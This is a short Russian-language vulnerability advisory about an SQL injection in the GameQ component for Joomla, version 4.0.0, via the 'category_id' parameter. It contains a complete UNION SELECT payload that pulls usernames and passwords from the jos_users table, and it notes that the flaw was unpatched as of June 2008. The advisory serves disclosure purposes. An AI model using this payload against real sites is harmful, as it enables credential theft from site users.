Эксплоит для уязвимости Joomla GameQ Component к SQL-инъекции через “category_id”
Сектор:
Корпоративное ПО
Производитель:
Продукт:
Версия:
4.0.0
Тип:
Раскрытие/утечка информации 
Раскрытие/утечка информации – Общее определение: уязвимости, относящиеся к этой категории, позволяют злоумышленнику получить несанкционированный доступ к различной информации.
Локальная/удаленная:
удаленная
Уязвимость:
уязвимость
Код:
ссылка
Описание эксплойта
Внедряемый запрос передается через параметр “category_id” главного сценария Joomla, index.php (option=com_gameq, task=page).
Пример:
index.php?option=com_gameq&task=page&category_id=
{SQL}:
-1 UNION SELECT 1,2,3,concat(username,0×3a,password),5,6,7,8,9,10,11,12,13,14 FROM jos_users–
Описание уязвимости
В компоненте Joomla, GameQ, обнаружена уязвимость к SQL-инъекции через параметр “category_id” (index.php, option=com_gameq, task=page). Параметр не проверяется перед использованием в составе SQL-запроса, что позволяет атакующему дополнить запрос произвольным образом.
ЗАЩИТА
По данным на 10 июня 2008 г., уязвимость не устранена.
Страница продукта: здесь.